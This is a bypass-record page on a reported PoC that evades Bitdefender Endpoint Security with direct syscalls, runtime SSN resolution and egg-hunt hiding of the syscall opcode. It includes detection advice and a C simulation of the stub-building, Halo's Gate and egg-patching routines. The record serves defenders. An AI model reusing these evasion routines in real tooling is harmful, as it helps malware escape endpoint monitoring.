Bypass Record

Direct Syscalls × Bitdefender Endpoint Security

A publicly-reported instance of Direct Syscalls bypassing Bitdefender Endpoint Security, recorded with its original source. Factual record; no assessment of any specific deployment.

Product
Bitdefender Endpoint Security
Technique
Direct Syscalls
MITRE ATT&CK
T1106
Confidence
Medium
Severity
High
Status
poc
Disclosed
2024-05-08
Config / version noted
Not stated

Provenance

Reported as

The author claims successful bypass of Bitdefender and Microsoft Defender for Endpoint.

Mechanism

Combines direct syscalls with dynamic System Service Number (SSN) resolution, so the Nt* calls never pass through the ntdll.dll exports that user-mode EDR sensors hook. An egg-hunt step replaces the syscall instruction in each stub with a marker of random bytes when the binary is built and patches the real instruction back in at run time, so a static scan of the file finds no syscall opcode. The author also reports using Windows API forking (described in the source as process ghosting/forking) and randomised function prototypes and procedure names to hinder static analysis.

Detection & mitigation

Monitor for syscall/sysenter instructions executed from memory outside ntdll.dll (the process's own image, heap, or a manually mapped copy of ntdll), and for code that resolves syscall numbers at run time by walking ntdll's export table or reading stub bytes. Because the egg-hunt step described above removes the syscall opcode from the stub on disk, this check has to be made against executing memory (for example the return address at the time of a kernel callback), not against the file. In the kernel, use process-creation callbacks (e.g., PsSetCreateProcessNotifyRoutine) and ETW providers to surface process ghosting/forking anomalies, and enforce application control policies so that unsigned or untrusted executables cannot run.
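Both halves of this record, the resolution-plus-egg mechanism and the defender's opcode check, can be shown on plain byte buffers. The following C program is an added example and is not the cited author's tooling or code from the source; it executes no syscall, so it builds on any platform. It assumes the dynamic SSN resolution is done Hell's Gate style (reading the number from the stub's mov eax,imm32) with a Halo's Gate neighbour walk when the stub is hooked, which the record does not state; the ntdll bytes, SSN values, hook bytes and egg marker are all constructed for the demonstration.

```c
/* Added example, not the cited author's code: models direct-syscall stub
 * building, dynamic SSN resolution (Hell's Gate, with a Halo's Gate
 * neighbour walk when the stub is hooked) and the egg-hunt patch on plain
 * byte buffers. No syscall executes, so it builds on any platform. The
 * "ntdll" bytes, SSN values and egg marker are constructed for the demo. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STUB_SPACING 32   /* x64 ntdll lays Nt/Zw stubs out 32 bytes apart */
#define N_STUBS      3
#define MAX_WALK     8    /* neighbours Halo's Gate will try in each direction */
#define DS_STUB_LEN  17   /* 8-byte prologue + 8-byte syscall slot + ret */

/* Constructed egg: occupies the syscall slot until run time. Chosen so it
 * contains no 0F 05 byte pair. */
static const uint8_t EGG[8] = {0xDE,0xAD,0xBE,0xEF,0xCA,0xFE,0xBA,0xBE};

/* Emit one clean x64 ntdll-style stub:
 *   4C 8B D1        mov r10, rcx
 *   B8 ss ss 00 00  mov eax, SSN
 *   test/jne, 0F 05 syscall, C3 ret, CD 2E int 2Eh, C3 ret, CC padding */
static void write_ntdll_stub(uint8_t *dst, uint16_t ssn) {
    static const uint8_t tail[] = {0xF6,0x04,0x25,0x08,0x03,0xFE,0x7F,0x01,
                                   0x75,0x03, 0x0F,0x05, 0xC3, 0xCD,0x2E,0xC3};
    memset(dst, 0xCC, STUB_SPACING);
    dst[0]=0x4C; dst[1]=0x8B; dst[2]=0xD1; dst[3]=0xB8;
    dst[4]=(uint8_t)ssn; dst[5]=(uint8_t)(ssn >> 8); dst[6]=0; dst[7]=0;
    memcpy(dst + 8, tail, sizeof tail);
}

/* Hell's Gate: read the SSN out of an unhooked stub's mov eax,imm32.
 * Returns -1 if the prologue is not intact (e.g. an E9 jmp hook). */
static int hellsgate_ssn(const uint8_t *stub) {
    if (stub[0]==0x4C && stub[1]==0x8B && stub[2]==0xD1 && stub[3]==0xB8 &&
        stub[6]==0x00 && stub[7]==0x00)
        return stub[4] | (stub[5] << 8);
    return -1;
}

/* Halo's Gate: if the wanted stub is hooked, walk to neighbouring stubs
 * (their SSNs are consecutive) and derive the number from a clean one. */
static int halosgate_ssn(const uint8_t *base, size_t len, size_t off) {
    int ssn = hellsgate_ssn(base + off);
    if (ssn >= 0) return ssn;
    for (int k = 1; k <= MAX_WALK; k++) {
        size_t step = (size_t)k * STUB_SPACING;
        if (off + step + STUB_SPACING <= len &&
            (ssn = hellsgate_ssn(base + off + step)) >= 0) return ssn - k;
        if (off >= step && (ssn = hellsgate_ssn(base + off - step)) >= 0) return ssn + k;
    }
    return -1;
}

/* Direct-syscall stub with the egg in place of 0F 05, so the on-disk image
 * carries no syscall instruction: mov r10,rcx ; mov eax,SSN ; <egg> ; ret */
static void build_egg_stub(uint8_t *dst, uint16_t ssn) {
    dst[0]=0x4C; dst[1]=0x8B; dst[2]=0xD1; dst[3]=0xB8;
    dst[4]=(uint8_t)ssn; dst[5]=(uint8_t)(ssn >> 8); dst[6]=0; dst[7]=0;
    memcpy(dst + 8, EGG, 8);
    dst[16] = 0xC3;
}

/* Egg hunter: at run time overwrite every egg with syscall + nop padding.
 * Returns the number of sites patched. A real loader would first make the
 * stub region writable and flush the instruction cache. */
static int patch_eggs(uint8_t *buf, size_t len) {
    static const uint8_t syscall_nops[8] = {0x0F,0x05,0x90,0x90,0x90,0x90,0x90,0x90};
    int n = 0;
    for (size_t i = 0; i + 8 <= len; i++)
        if (memcmp(buf + i, EGG, 8) == 0) { memcpy(buf + i, syscall_nops, 8); n++; i += 7; }
    return n;
}

/* Defender side: the crude form of "syscall instruction outside ntdll" is
 * counting 0F 05 in a non-ntdll executable region. 0F 05 also occurs inside
 * other encodings, so production scanners add context (preceding mov eax,imm). */
static int count_syscall_opcodes(const uint8_t *buf, size_t len) {
    int n = 0;
    for (size_t i = 0; i + 1 < len; i++) if (buf[i]==0x0F && buf[i+1]==0x05) n++;
    return n;
}

/* Constructed ntdll .text: stubs with SSNs 0x18..0x1A, the middle one
 * overwritten with a 5-byte jmp as a user-mode EDR hook would do. */
static void build_fake_ntdll(uint8_t *img) {
    for (int i = 0; i < N_STUBS; i++)
        write_ntdll_stub(img + i * STUB_SPACING, (uint16_t)(0x18 + i));
    img[STUB_SPACING] = 0xE9;
    memset(img + STUB_SPACING + 1, 0x00, 4);
}

int main(void) {
    uint8_t ntdll[N_STUBS * STUB_SPACING], stub[DS_STUB_LEN];
    build_fake_ntdll(ntdll);
    printf("stub1 Hell's Gate: %d (hooked)\n", hellsgate_ssn(ntdll + STUB_SPACING));
    int ssn = halosgate_ssn(ntdll, sizeof ntdll, STUB_SPACING);
    printf("stub1 Halo's Gate: %d\n", ssn);
    build_egg_stub(stub, (uint16_t)ssn);
    printf("syscall opcodes before patch: %d\n", count_syscall_opcodes(stub, sizeof stub));
    printf("eggs patched: %d\n", patch_eggs(stub, sizeof stub));
    printf("syscall opcodes after patch : %d\n", count_syscall_opcodes(stub, sizeof stub));
    return 0;
}
```

Compile with any C compiler and run. The hooked stub yields -1 from the direct read and the correct number from the neighbour walk, and the defender-side count is 0 before the egg is patched and 1 after, which is exactly why the detection advice above has to be applied to executing memory rather than to the file on disk.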

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.